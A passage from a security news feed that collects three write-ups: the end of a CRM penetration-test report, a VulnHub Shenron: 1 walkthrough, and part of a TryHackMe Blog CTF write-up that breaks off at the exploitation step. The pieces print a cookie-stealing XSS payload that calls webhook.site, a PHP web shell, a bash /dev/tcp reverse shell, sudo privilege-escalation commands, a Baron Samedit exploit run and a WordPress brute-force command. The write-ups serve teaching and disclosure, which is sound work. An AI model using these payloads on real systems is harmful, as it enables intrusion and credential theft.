&lt;img src=x onerror="alert('XSS_SUCCESS_DASHBOARD')"&gt;</pre><pre>leads.full_name: &lt;script&gt;fetch('https://webhook.site/[REDACTED]<br>                 ?sessiya=' + btoa(document.cookie))&lt;/script&gt;</pre><pre>instructor_notes.author: &lt;details open ontoggle=alert(1)&gt; Administrator<br>instructor_notes.content: &lt;img src=x onerror="alert('Sizin sessiyanız oğurlandı: '<br>                           + document.cookie)"&gt;</pre><pre>chats.content: "&gt; &lt;script&gt;alert('XSS')&lt;/script&gt;</pre><p>Stored XSS payloads — across four different tables. And the webhook payload in leads.full_name was actively sending base64-encoded cookie data to an external server.</p><p>I confirmed the application renders these fields without sanitization. Any authenticated user who views the Leads, Tickets, or Instructor Notes sections would execute these scripts in their browser.</p><p>The document.cookie exfiltration payload via fetch() to webhook.site means that an attacker who plants this payload in a lead record waits for an admin to open the leads page — and receives their session token automatically.</p><p><strong>What should have happened:</strong></p><ul><li>All user-supplied input must be sanitized server-side before database writes</li><li>Output must be encoded at render time — React’s default JSX escaping prevents this, but dangerouslySetInnerHTML bypasses it</li><li>A strict Content Security Policy (CSP) header blocks inline scripts and restricts fetch() destinations</li><li>Existing payload records must be purged from the database</li></ul><h3>V-06 — CORS Misconfiguration: Wildcard Origin [HIGH | CVSS 7.5]</h3><p><strong>CWE-942 — Permissive Cross-Origin Resource Sharing Policy</strong></p><p>The OPTIONS preflight response from every API endpoint returned:</p><pre>Access-Control-Allow-Origin: *<br>Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS<br>Access-Control-Allow-Headers: Content-Type, Authorization</pre><p>A wildcard Access-Control-Allow-Origin means any website on the internet can make JavaScript-initiated cross-origin requests to these endpoints and read the full responses.</p><p>Combined with V-01 (unauthenticated API access), this means a malicious website could silently harvest all CRM data from any visitor’s browser — without any user interaction other than visiting the page.</p><p><strong>What should have happened:</strong></p><ul><li>Replace * with an explicit origin allowlist</li><li>Restrict allowed methods to what each endpoint actually needs</li><li>Use Next.js middleware for CORS enforcement rather than relying solely on nginx headers</li></ul><h3>V-07 — Business Logic Flaw: Negative Payment Amounts [MEDIUM | CVSS 6.5]</h3><p><strong>CWE-840 — Business Logic Errors</strong></p><p>In the payments table, I found records with negative monetary values:</p><pre>student: [REDACTED] | amount: -99999 | invoice: INV-TEST-99999 | status: paid<br>student: [REDACTED] | amount: -3000  | invoice: HACK-999-001   | status: paid</pre><p>The invoice ID HACK-999-001 is particularly notable — it suggests this was not an accidental entry.</p><p>The API accepted these values without any server-side validation. If the application processes negative amounts as refunds or credits, an attacker could manipulate financial records or corrupt reporting.</p><p><strong>What should have happened:</strong></p><ul><li>Server-side validation rejecting any payment amount ≤ 0</li><li>Database-level constraint: CHECK (amount &gt; 0) on the payments table</li><li>Investigation and cleanup of anomalous records</li></ul><h3>V-08 — Information Disclosure: Stack &amp; Schema Details [LOW | CVSS 4.3]</h3><p><strong>CWE-200 — Exposure of Sensitive Information</strong></p><p>Several endpoints leaked technical implementation details:</p><pre>GET /api/health<br># Returns: {"status":"healthy","node_version":"v24.15.0","uptime":1.019}</pre><pre>GET /rest/v1/instructors<br># Returns: PGRST205 hint: 'Perhaps you meant public.instructor_notes'</pre><pre>GET /rest/v1/schedules<br># Returns: PGRST205 hint: 'Perhaps you meant public.schedule_events'</pre><p>The PostgREST error hints are essentially a free schema enumeration tool — they reveal exact database table names when you guess wrong. The Next.js Build ID was also embedded in every page response, enabling precise version correlation.</p><p>Low severity on its own, but useful context for a targeted attacker combining it with higher-severity findings.</p><h3>A Disturbing Discovery: Evidence of Prior Exploitation</h3><p>The most unsettling moment of the entire assessment came from reading the database carefully.</p><p>Stored inside production records — tickets, payments — were payloads that were clearly not part of the application’s legitimate data:</p><ul><li><strong>A PostgreSQL RCE attempt:</strong> COPY FROM PROGRAM syntax stored in a ticket record, suggesting at least one external actor attempted server-side command execution through the database</li><li><strong>A Go template injection payload:</strong> {{range .}}{{end}}{{template "exploit" .}} — stored in another ticket, probing for server-side template injection</li><li><strong>XSS payloads actively sending data to webhook.site</strong> — confirming that at least one external party had already planted exfiltration scripts and was receiving session cookies</li><li><strong>A Burp Suite Collaborator (oastify.com) OAST payload</strong> in the payments table — indicating active out-of-band testing by an external party</li></ul><p>This wasn’t a theoretical attack surface. Someone had already found these vulnerabilities, and they were actively using them.</p><h3>The Complete Attack Chain</h3><pre>[Attacker — No credentials, no prior knowledge]<br>        │<br>        ▼<br>[1] Passive recon → identify Next.js + Supabase stack from JS bundles<br>        │<br>        ▼<br>[2] feroxbuster → discover /api/tickets, /api/search, /api/dashboard<br>        │<br>        ▼<br>[3] curl /api/tickets (no auth) → 200 OK → V-01 confirmed<br>        │<br>        ▼<br>[4] Burp Suite intercept → extract Supabase URL + anon key from headers<br>        │<br>        ▼<br>[5] GET /rest/v1/users?select=* → 38 users, plaintext passwords, all roles<br>    GET /rest/v1/leads?select=*  → 39 lead records with PII<br>    GET /rest/v1/payments?select=* → 31 payment records<br>    ... (complete database dump — V-02, V-03)<br>        │<br>        ▼<br>[6] POST /api/login {"email": "[ANY_ADMIN_EMAIL]"} (no password) → auth bypass<br>    → SUPER_ADMIN session obtained — V-04<br>        │<br>        ▼<br>[7] Authenticated access → inject XSS payload in leads/tickets/notes<br>    → Any admin who views the record executes the payload<br>    → Session cookie exfiltrated to attacker webhook — V-05<br>        │<br>        ▼<br>[8] Full account takeover — all SUPER_ADMIN, INSTRUCTOR, SUPPORT accounts<br>    accessible. All data readable, modifiable, deletable.</pre><pre>TOTAL TIME FROM ZERO TO FULL COMPROMISE: &lt; 30 minutes</pre><h3>Remediation Roadmap</h3><p><strong>Immediate — 24 hours</strong></p><p><strong>1 · V-02 · Exposed Supabase Anon Key</strong> Rotate the Supabase anon key immediately. Enable Row Level Security on every table. Move all API keys to server-side environment variables — never in client-side JavaScript bundles.</p><p><strong>2 · V-03 · Plaintext Password Storage</strong> Hash all stored passwords using bcrypt (cost ≥ 12) or Argon2id. Force a password reset for every account. The password field must never be returned in any API response.</p><p><strong>Urgent — 72 hours</strong></p><p><strong>3 · V-01 · Unauthenticated API Access</strong> Add authentication middleware to all /api/* routes. No endpoint that returns user data should be reachable without a valid session.</p><p><strong>4 · V-04 · Authentication Bypass</strong> Enforce mandatory validation of both email and password fields at the API handler level before any database query runs. Return HTTP 400 for any missing field.</p><p><strong>High — 1 week</strong></p><p><strong>5 · V-05 · Stored XSS</strong> Sanitize all user-supplied input server-side before database writes. Implement a strict Content Security Policy header. Purge all existing XSS payload records from the database.</p><p><strong>6 · V-06 · CORS Wildcard</strong> Replace Access-Control-Allow-Origin: * with an explicit origin allowlist. Restrict allowed methods per endpoint.</p><p><strong>Medium / Low</strong></p><p><strong>7 · V-07 · Negative Payment Amounts</strong> <em>(2 weeks)</em> Validate amount &gt; 0 at the API handler level and enforce a CHECK (amount &gt; 0) constraint at the database layer.</p><p><strong>8 · V-08 · Information Disclosure</strong> <em>(1 month)</em> Restrict /api/health to internal access only. Suppress verbose PostgREST error hints in all client-facing responses.</p><h3>Key Takeaways for Developers</h3><p>The vulnerabilities found here are not exotic or theoretical. They are some of the most common and preventable mistakes in modern web application development.</p><p><strong>1. Never put secrets in client-side JavaScript.</strong> A Supabase anon key in your JavaScript bundle is a key handed to every visitor. Treat your frontend code as fully public. All API keys belong in server-side environment variables, proxied through server-side routes.</p><p><strong>2. Supabase RLS is not optional.</strong> Supabase’s Row Level Security exists precisely because the PostgREST API is designed to be called from the client. Without RLS policies, your anon key grants read access to every row in every table. Enable RLS. Add explicit policies. Deny by default.</p><p><strong>3. Validate authentication inputs on the server.</strong> Never trust that a request body contains what it should. If password is missing, return 400 immediately. Use Zod or Joi to enforce input schemas at the API handler level before any database query runs.</p><p><strong>4. Never store plaintext passwords.</strong> This should go without saying in 2026, but here we are. Use bcrypt, scrypt, or Argon2id. Never compare plaintext. Never return the password field in any API response — not even to authenticated admins.</p><p><strong>5. Sanitize all inputs, encode all outputs.</strong> If user-supplied data is rendered in a browser, it must be sanitized before storage and encoded at render time. React’s default JSX escaping helps — but only if you don’t bypass it with dangerouslySetInnerHTML.</p><p><strong>6. Monitor your own database for signs of compromise.</strong> The presence of PostgreSQL RCE attempts, template injection payloads, and active cookie-stealing XSS scripts in production data is a strong indicator of prior exploitation. Regular database audits and anomaly detection would have surfaced these earlier.</p><h3>Responsible Disclosure Timeline</h3><p><strong>April 25, 2026</strong> — Assessment conducted with full authorization <strong>April 25, 2026</strong> — Full technical report delivered to MilliSec leadership <strong>April 25, 2026</strong> — Organization notified of critical findings requiring immediate action <strong>May 2026</strong> — Write-up published after internal review and redaction</p><h3>Final Thoughts</h3><p>This was one of the most eye-opening assessments I’ve done. Not because of technical complexity — none of these vulnerabilities required advanced exploitation. The hardest part was writing a GET request with curl.</p><p>What made it sobering was the evidence that other actors had already found the same path. The database had traces of PostgreSQL RCE attempts, active XSS exfiltration, and Burp Collaborator callbacks — left by people who found this before I did and may have been quietly exfiltrating data.</p><p>The good news: every single one of these vulnerabilities is fixable. Most of them within hours. The patch for V-04 is literally one if statement. The patch for V-02 is moving a string from a .js file to a .env.local file. The barrier to fixing these is low. The cost of not fixing them is everything.</p><p><em>If you found this useful, feel free to connect on </em><a href="https://linkedin.com/in/camalzads"><em>LinkedIn</em></a><em> or check out my tools on </em><a href="https://github.com/alisalive"><em>GitHub</em></a><em>.</em></p><p><em>All testing was conducted on an authorized target with full written permission. Never test systems you don’t own or have explicit authorization to test.</em></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=98c030a57ab1" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/i-pentested-a-real-crm-system-and-found-4-critical-vulnerabilities-heres-the-full-attack-chain-98c030a57ab1">I Pentested a Real CRM System and Found 4 Critical Vulnerabilities — Here’s the Full Attack Chain</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[VulnHub — Shenron: 1 | Full Walkthrough]]></title>
<description><![CDATA[Author: Shikhali Jamalzade GitHub: github.com/alisalive LinkedIn: linkedin.com/in/camalzadsPlatform: VulnHub Machine: Shenron: 1 by Shubham Mandloi Difficulty: Easy/Medium OS: Ubuntu 20.04.1 LTSOverviewShenron: 1 is a beginner-to-intermediate VulnHub machine built around a misconfigured Joomla CM...]]></description>
<link>https://tsecurity.de/de/3606857/hacking/vulnhub-shenron-1-full-walkthrough/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3606857/hacking/vulnhub-shenron-1-full-walkthrough/</guid>
<pubDate>Thu, 18 Jun 2026 08:51:21 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*L3xo_CwYbI7SdkdEV7rwJQ.png"></figure><p><strong>Author:</strong> <a href="https://medium.com/u/20557ba7487d">Shikhali Jamalzade</a> <br><strong>GitHub:</strong> <a href="https://github.com/alisalive">github.com/alisalive</a> <br><strong>LinkedIn:</strong> <a href="https://www.linkedin.com/in/shikhali-jamalzade">linkedin.com/in/</a>camalzads<br><strong>Platform:</strong> VulnHub <br><strong>Machine:</strong> <a href="https://www.vulnhub.com/entry/shenron-1,630/">Shenron: 1</a> by Shubham Mandloi <br><strong>Difficulty:</strong> Easy/Medium <strong>OS:</strong> Ubuntu 20.04.1 LTS</p><h3>Overview</h3><p>Shenron: 1 is a beginner-to-intermediate VulnHub machine built around a misconfigured Joomla CMS deployment. The attack path begins with credentials carelessly left in an HTML comment, escalates through a malicious extension upload for Remote Code Execution, and culminates in full root access via three distinct privilege escalation vectors. This machine is an excellent practical exercise covering real-world misconfigurations seen in production environments.</p><p><strong>Flags captured:</strong></p><ul><li>local.txt → 098bf43cc909e1f89bb4c910bd31e1d4</li><li>root.txt → aa087b2d466cd593622798c8e972bffb</li></ul><h3>Reconnaissance</h3><h3>Network Scan</h3><p>I began with a thorough Nmap scan to enumerate open ports, running services, and OS details:</p><pre>nmap -sC -sV -oN nmap/shenron.txt 192.168.100.210</pre><p><strong>Results:</strong></p><pre>PORT   STATE SERVICE VERSION<br>22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1<br>80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))</pre><p><strong>Key observations:</strong></p><ul><li>Only two ports exposed: SSH (22) and HTTP (80)</li><li>OS fingerprinted as <strong>Ubuntu 20.04.1 LTS (Focal Fossa)</strong></li><li>MAC: 08:00:27:F4:52:F8 → Oracle VirtualBox NIC</li><li>Apache 2.4.41 — an outdated version</li></ul><p>The minimal attack surface here pushes us straight to web enumeration.</p><h3>Web Enumeration</h3><h3>Directory Brute-Force with Dirb</h3><pre>dirb http://192.168.100.210 /usr/share/wordlists/dirb/common.txt</pre><p><strong>Discovered paths:</strong></p><pre>+ http://192.168.100.210/joomla/              [200]<br>+ http://192.168.100.210/joomla/administrator [200]<br>+ http://192.168.100.210/test/               [301]<br>+ http://192.168.100.210/server-status       [403]</pre><p>Two immediately interesting paths emerged:</p><ul><li>/joomla/ — A Joomla CMS installation</li><li>/test/ — A suspicious, unlisted directory</li></ul><h3>Investigating /test/</h3><p>Browsing to http://192.168.100.210/test/ revealed a directory listing. Inside was a file named password. On opening it, the page source contained the following HTML comment:</p><pre>&lt;!-- admin:3iqtzi4RhkWANcu@$pa$$ --&gt;</pre><p>A plaintext admin credential sitting in an HTML comment — a classic and critically dangerous developer mistake.</p><h3>Initial Access</h3><h3>F-01 — Credentials Hardcoded in HTML Comment</h3><p>Detail Value URL http://192.168.100.210/test/password Credentials admin : 3iqtzi4RhkWANcu@$pa$$ Severity <strong>Critical</strong></p><p>With these credentials, I navigated to the Joomla administrator panel:</p><pre>http://192.168.100.210/joomla/administrator/</pre><p>Login succeeded. We now had full administrative control over the Joomla CMS — this is the starting point for everything that follows.</p><h3>Foothold</h3><h3>F-03 — Remote Code Execution via Malicious Joomla Extension</h3><p>Joomla’s admin panel allows uploading extension packages (.zip files). I crafted a malicious PHP web shell disguised as a Joomla extension.</p><p><strong>Web shell payload (</strong><strong>shell.php):</strong></p><pre>&lt;?php system($_GET['cmd']); ?&gt;</pre><p>Packaged this into a .zip file structured as a valid Joomla extension and uploaded it via:</p><pre>Extensions → Install → Upload Package File</pre><p>The shell was deployed to:</p><pre>http://192.168.100.210/joomla/shell/shell.php</pre><p><strong>Verification:</strong></p><pre>http://192.168.100.210/joomla/shell/shell.php?cmd=id</pre><p>Response: uid=33(www-data) gid=33(www-data) groups=33(www-data) ✓</p><h3>Upgrading to a Reverse Shell</h3><p>Set up a Netcat listener on Kali:</p><pre>nc -lvnp 4444</pre><p>Triggered a bash reverse shell from the web shell:</p><pre>?cmd=bash -c 'bash -i &gt;%26 /dev/tcp/192.168.100.130/4444 0&gt;%261'</pre><p>Shell received:</p><pre>Connection received on 192.168.100.210 50792<br>www-data@shenron:/var/www/html/joomla/shell$</pre><p>Stabilised the shell for full interactivity:</p><pre>python3 -c 'import pty; pty.spawn("/bin/bash")'<br># Ctrl+Z<br>stty raw -echo; fg<br>export TERM=xterm</pre><p>We now had a stable shell as www-data.</p><h3>Privilege Escalation: www-data → jenny</h3><h3>F-04 — Database Credentials in configuration.php</h3><p>With filesystem access as www-data, I read the Joomla configuration file:</p><pre>cat /var/www/html/joomla/configuration.php</pre><pre>class JConfig {<br>    public $dbtype  = 'mysqli';<br>    public $host    = 'localhost';<br>    public $user    = 'jenny';<br>    public $password = 'Mypa$$wordi$notharD@123';<br>    public $db      = 'joomla_db';<br>}</pre><p>Credentials in plaintext. The database user jenny — could this be a system user too?</p><h3>F-05 — Password Reuse</h3><pre>su jenny<br>Password: Mypa$$wordi$notharD@123</pre><p>It worked. The database password was identical to the OS account password. This is a textbook password reuse vulnerability.</p><pre>whoami<br># jenny</pre><h3>Privilege Escalation: jenny → shenron</h3><h3>F-06 — Sudo Misconfiguration: cp (NOPASSWD)</h3><pre>sudo -l</pre><pre>User jenny may run the following commands on shenron:<br>    (shenron) NOPASSWD: /usr/bin/cp</pre><p>The cp binary can be run as user shenron without a password. This is exploitable via <strong>SSH authorized key injection</strong>.</p><p><strong>Exploit steps:</strong></p><ol><li>Generate an SSH keypair on the attacker machine (Kali):</li></ol><pre>ssh-keygen -t rsa -f /tmp/hacked_key</pre><ol><li>On the target, create a temporary file with the public key content:</li></ol><pre>echo "ssh-rsa AAAA...your_pub_key... root@kali" &gt; /tmp/authorized_keys</pre><ol><li>Use sudo cp as shenron to overwrite their authorized_keys:</li></ol><pre>sudo -u shenron /usr/bin/cp /tmp/authorized_keys /home/shenron/.ssh/authorized_keys</pre><ol><li>SSH in as shenron from Kali:</li></ol><pre>ssh -i /tmp/hacked_key shenron@192.168.100.210</pre><p>Shell received:</p><pre>Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-58-generic x86_64)<br>shenron@shenron:~$</pre><h3>User Flag</h3><pre>cat /home/shenron/local.txt</pre><pre>098bf43cc909e1f89bb4c910bd31e1d4</pre><p>🚩 <strong>User flag captured.</strong></p><h3>Privilege Escalation: shenron → root</h3><p>Three independent root escalation paths were identified:</p><h3>Path 1: sudo apt GTFOBins {#path-1}</h3><pre>sudo -l</pre><pre>User shenron may run the following commands on shenron:<br>    (ALL : ALL) /usr/bin/apt</pre><p>apt is on <a href="https://gtfobins.github.io/gtfobins/apt/">GTFOBins</a>. The Pre-Invoke option in apt allows injecting an arbitrary command before any apt operation:</p><pre>sudo /usr/bin/apt update -o APT::Update::Pre-Invoke::="/bin/bash"</pre><p>Password prompted (found in the next section). Result:</p><pre>root@shenron:/tmp# id<br>uid=0(root) gid=0(root) groups=0(root)</pre><h3>F-07 — Plaintext Password File (shenron’s credentials)</h3><p>Before escalating, I ran LinPEAS and discovered:</p><pre>cat /var/opt/password.txt</pre><pre>shenron : YoUkNowMyPaSsWoRdIsToStRoNgDeAr</pre><p>A system user’s password stored in a plaintext file in a world-readable directory.</p><p><strong>Root Flag:</strong></p><pre>cat /root/root.txt</pre><pre>Your Root Flag Is Here :- aa087b2d466cd593622798c8e972bffb</pre><p>🚩 <strong>Root flag captured.</strong></p><h3>Path 2: CVE-2021–3156 — Baron Samedit {#path-2}</h3><p>The system runs sudo 1.8.31 on Ubuntu 20.04.1. This version is vulnerable to <strong>CVE-2021-3156 (Baron Samedit)</strong>, a heap-based buffer overflow in sudo that allows any local user to gain root privileges without knowing the sudo password.</p><pre>sudo --version<br># Sudo version 1.8.31</pre><p>I transferred the PoC exploit (by blasty) to the target via a Python HTTP server:</p><pre># On Kali:<br>git clone https://github.com/blasty/CVE-2021-3156<br>cd CVE-2021-3156<br>python3 -m http.server 8080</pre><pre># On target (as shenron):<br>cd /home/shenron<br>wget <a href="http://192.168.100.130:8080/CVE-2021-3156-main.zip">http://192.168.100.130:8080/CVE-2021-3156-main.zip</a><br>unzip CVE-2021-3156-main.zip<br>cd CVE-2021-3156-main<br>make<br>./sudo-hax-me-a-sandwich 1</pre><pre>** CVE-2021-3156 PoC by blasty &lt;peter@haxx.in&gt;<br>using target: Ubuntu 20.04.1 (Focal Fossa) - sudo 1.8.31, libc-2.31<br>** pray for your rootshell.. **<br>[+] bl1ng bl1ng! We got it!<br># id<br>uid=0(root) gid=0(root) groups=0(root),1002(shenron)</pre><p>Root achieved via an unpatched kernel-level CVE — entirely independent of the sudo misconfiguration in Path 1.</p><h3>Path 3: MySQL Root Shell Execution {#path-3}</h3><p>LinPEAS flagged a world-readable MySQL maintenance credentials file:</p><pre>cat /etc/mysql/debian.cnf</pre><pre>[client]<br>host     = localhost<br>user     = debian-sys-maint<br>password = IcEgakXDwR6Sf4VJ</pre><p>Logged into MySQL as root (after resetting the root password using the debian-sys-maint credentials):</p><pre>mysql -u root -proot</pre><p>Inside MySQL, used the \! shell escape to execute system commands as the MySQL process owner (root):</p><pre>mysql&gt; \! id<br>uid=0(root) gid=0(root) groups=0(root)</pre><pre>mysql&gt; \! whoami<br>root</pre><p>A third, fully independent path to root — all from a misconfigured file permission.</p><h3>Post-Exploitation — LinPEAS Analysis</h3><p>After rooting the box, I ran a full LinPEAS scan to document any additional attack surface:</p><pre># On Kali:<br>wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh<br>python3 -m http.server 8080</pre><pre># On target:<br>cd /tmp<br>wget <a href="http://192.168.100.130:8080/linpeas.sh">http://192.168.100.130:8080/linpeas.sh</a><br>chmod +x linpeas.sh<br>./linpeas.sh | tee /tmp/linpeas_output.txt</pre><h3>Additional findings from LinPEAS:</h3><p>Finding Location Severity sudo 1.8.31 → CVE-2021–3156 System Critical Kernel CVE-2021–22555 Netfilter heap OOB High Kernel CVE-2022–2586 nft_object UAF High MySQL credentials exposed /etc/mysql/debian.cnf High Joomla 3.x (End of Life) Web server High PHP 7.4.3 (outdated) Web server Medium Apache 2.4.41 (outdated) Web server Medium</p><h3>Attack Chain Summary</h3><pre>[Attacker / Kali Linux]<br>        │<br>        ▼<br>[1] Nmap → ports 22, 80 open<br>        │<br>        ▼<br>[2] Dirb → /joomla/, /test/ discovered<br>        │<br>        ▼<br>[3] /test/password → HTML comment → admin credentials (F-01)<br>        │<br>        ▼<br>[4] Joomla admin login → malicious extension upload → RCE (F-03)<br>        │<br>        ▼<br>[5] Reverse shell → www-data<br>        │<br>        ▼<br>[6] configuration.php → jenny:Mypa$$wordi$notharD@123 (F-04)<br>        │<br>        ▼<br>[7] su jenny → password reuse (F-05)<br>        │<br>        ▼<br>[8] sudo -l → cp NOPASSWD as shenron → SSH key injection (F-06)<br>        │<br>        ▼<br>[9] SSH → shenron ✓  local.txt: 098bf43cc909e1f89bb4c910bd31e1d4<br>        │<br>        ├──[Path 1]── sudo apt GTFOBins + /var/opt/password.txt (F-07, F-08) → root<br>        ├──[Path 2]── CVE-2021-3156 Baron Samedit (F-09) → root<br>        └──[Path 3]── /etc/mysql/debian.cnf → MySQL \! shell (F-10) → root</pre><pre>root.txt: aa087b2d466cd593622798c8e972bffb ✓</pre><h3>Key Takeaways</h3><p>This machine packs a dense set of real-world lessons into a compact attack chain:</p><p><strong>1. Never store credentials in HTML source code.</strong> The HTML comment in /test/password was the single biggest mistake on this machine. Without it, the entire attack chain collapses. Treat your HTML source as fully public — because it is.</p><p><strong>2. Separate service credentials from system account credentials.</strong> Using the same password for the Joomla database user and the OS account jenny allowed a lateral pivot that should not have been possible. Always use distinct, randomly generated credentials per service.</p><p><strong>3. Audit your sudoers file carefully — GTFOBins is real.</strong> Both cp and apt are on GTFOBins. Any binary listed there should never appear in a sudoers file without strict command argument restrictions. Run sudo -l as part of every system audit.</p><p><strong>4. Keep sudo patched.</strong> CVE-2021–3156 is a critical, well-known sudo vulnerability. Sudo 1.8.31 on Ubuntu 20.04 should have been patched months before this test. Patch management is not optional.</p><p><strong>5. File permissions matter.</strong> /var/opt/password.txt containing a plaintext user password and /etc/mysql/debian.cnf being world-readable are configuration failures that hand attackers the keys directly.</p><p><strong>6. End-of-Life software is a liability.</strong> Joomla 3.x reached End of Life. Running EOL software means no more security updates — even critical ones. Upgrade or migrate.</p><p><em>Thanks for reading! If you enjoyed this writeup, feel free to connect on </em><a href="https://linkedin.com/in/camalzads"><em>LinkedIn</em></a><em> or check out my tools and other work on </em><a href="https://github.com/alisalive"><em>GitHub</em></a><em>.</em></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=05d09a54ab77" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/vulnhub-shenron-1-full-walkthrough-05d09a54ab77">VulnHub — Shenron: 1 | Full Walkthrough</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[TryHackMe — Blog CTF | Full Write-Up]]></title>
<description><![CDATA[Platform: TryHackMeRoom: BlogDifficulty: MediumAuthor: Shikhali Jamalzade“Billy Joel made a blog on his home computer and has started working on it. It’s going to be so awesome!”IntroductionThe Blog room on TryHackMe is a medium-difficulty machine themed around a WordPress blog run by “Billy Joel...]]></description>
<link>https://tsecurity.de/de/3606856/hacking/tryhackme-blog-ctf-full-write-up/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3606856/hacking/tryhackme-blog-ctf-full-write-up/</guid>
<pubDate>Thu, 18 Jun 2026 08:51:19 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*uiddSAKswc3c72q8QRJ2Wg.png"></figure><h4><strong>Platform:</strong> <a href="https://tryhackme.com/p/alisalive.exe">TryHackMe</a><br><strong>Room:</strong> <a href="https://tryhackme.com/room/blog">Blog</a><br><strong>Difficulty:</strong> Medium<br><strong>Author:</strong> <a href="https://medium.com/u/20557ba7487d">Shikhali Jamalzade</a></h4><blockquote>“Billy Joel made a blog on his home computer and has started working on it. It’s going to be so awesome!”</blockquote><h3>Introduction</h3><p>The <strong>Blog</strong> room on TryHackMe is a medium-difficulty machine themed around a WordPress blog run by “Billy Joel.” Beneath the casual surface, the machine hides a real CVE — <strong>CVE-2019–8942</strong>, a WordPress image crop Remote Code Execution vulnerability — paired with an unconventional custom binary for privilege escalation that’ll make you think twice before assuming an exploit needs complex reverse engineering.</p><p>Your goals:</p><ul><li>Find user.txt (not where you expect it)</li><li>Find root.txt</li><li>Answer three bonus questions about the machine</li></ul><p>There’s also a deliberate <strong>rabbit hole</strong> built into this room — a clue about a company called “Rubber Ducky Inc.” that hints at where the real user.txt is hiding. More on that later.</p><h3>Setup — /etc/hosts</h3><p>Before anything else, the room requires you to add an entry to your hosts file. Without this, the WordPress site won’t load correctly due to how it handles virtual hosting on AWS.</p><p>bash</p><pre>echo "&lt;TARGET_IP&gt; blog.thm" | sudo tee -a /etc/hosts</pre><p>Verify it works:</p><p>bash</p><pre>curl -s http://blog.thm | head -20</pre><h3>Phase 1 — Reconnaissance</h3><h3>Nmap Scan</h3><p>bash</p><pre>nmap -sC -sV -T4 -oN nmap_scan.txt &lt;TARGET_IP&gt;</pre><p><strong>Results:</strong></p><pre>PORT    STATE SERVICE     VERSION<br>22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu<br>80/tcp  open  http        Apache httpd 2.4.29<br>139/tcp open  netbios-ssn Samba smbd 3.X - 4.X<br>445/tcp open  microsoft-ds Samba smbd 4.7.6-Ubuntu</pre><p>Four open ports: SSH (22), HTTP (80), and two SMB ports (139, 445). The SMB shares are interesting — let’s note them for later. The web server on port 80 is our primary entry point.</p><p>The nmap script output also reveals something valuable right away:</p><pre>| http-generator: WordPress 5.0</pre><p>WordPress 5.0. That version number will be very significant shortly.</p><h3>Phase 2 — SMB Enumeration (The Rabbit Hole)</h3><p>With SMB open, let’s enumerate it. This is where the room tries to send you down a rabbit hole — and it’s worth walking through so you understand <em>why</em> it’s a dead end.</p><p>bash</p><pre>smbclient -L //&lt;TARGET_IP&gt;/ -N</pre><p>There’s a share called BillySMB. Connect to it:</p><p>bash</p><pre>smbclient //&lt;TARGET_IP&gt;/BillySMB -N<br>smb: \&gt; ls<br>smb: \&gt; get Alice-White-Rabbit.jpg<br>smb: \&gt; get tswift.jpg<br>smb: \&gt; get check-this.png</pre><p>Checking these files for hidden data (steganography):</p><p>bash</p><pre>steghide extract -sf Alice-White-Rabbit.jpg<br>strings check-this.png<br>exiftool tswift.jpg</pre><p>You’ll find a .txt file embedded in the Alice image, but it contains nothing useful for exploitation. The "Rubber Ducky Inc." reference in the room description is actually a hint pointing at /media/usb — but that's for after we get root.</p><p><strong>Verdict: SMB is a rabbit hole. Move on.</strong></p><h3>Phase 3 — WordPress Enumeration</h3><p>Visit http://blog.thm in your browser. It's a simple WordPress blog — a few posts, a comment section, nothing remarkable on the surface.</p><h3>WPScan — Full Enumeration</h3><p>bash</p><pre>wpscan --url http://blog.thm --enumerate ap,at,u --detection-mode aggressive</pre><p><strong>Flag breakdown:</strong></p><ul><li>--enumerate ap — All Plugins</li><li>--enumerate at — All Themes</li><li>--enumerate u — Users</li><li>--detection-mode aggressive — More thorough (generates noise, but we're in a lab)</li></ul><p><strong>Key findings:</strong></p><pre>[+] WordPress version: 5.0 (Insecure, released on 2018-12-06)<br>[+] XML-RPC seems to be enabled: http://blog.thm/xmlrpc.php</pre><pre>[i] User(s) Identified:<br>    [+] kwheel<br>    [+] bjoel<br>    [+] Karen Wheeler<br>    [+] Billy Joel</pre><p>Two important takeaways:</p><ol><li>WordPress 5.0 is running — this is vulnerable to CVE-2019–8942</li><li>We have usernames: kwheel and bjoel</li></ol><p>You can also enumerate users via the WordPress REST API without WPScan:</p><pre>http://blog.thm/wp-json/wp/v2/users</pre><p>This returns a JSON response listing all registered users — another common WordPress misconfiguration.</p><h3>Phase 4 — Credential Brute-Force</h3><p>We have usernames but no passwords. WPScan can brute-force via the XML-RPC interface, which is faster than attacking the login form directly.</p><p>bash</p><pre>wpscan --url http://blog.thm \<br>  -U kwheel,bjoel \<br>  -P /usr/share/wordlists/rockyou.txt \<br>  -t 50</pre><ul><li>-U — Username list</li><li>-P — Password wordlist</li><li>-t 50 — 50 threads for speed</li></ul><p><strong>Result:</strong></p><pre>[SUCCESS] - kwheel / cutiepie1</pre><blockquote><strong><em>Credentials found:</em></strong><em> </em><em>kwheel:cutiepie1</em></blockquote><p>Note that bjoel (Billy Joel himself) doesn't have a crackable password in rockyou — the machine intentionally made kwheel (Karen Wheeler) the weak link.</p><h3>Phase 5 — Exploitation: CVE-2019–8942 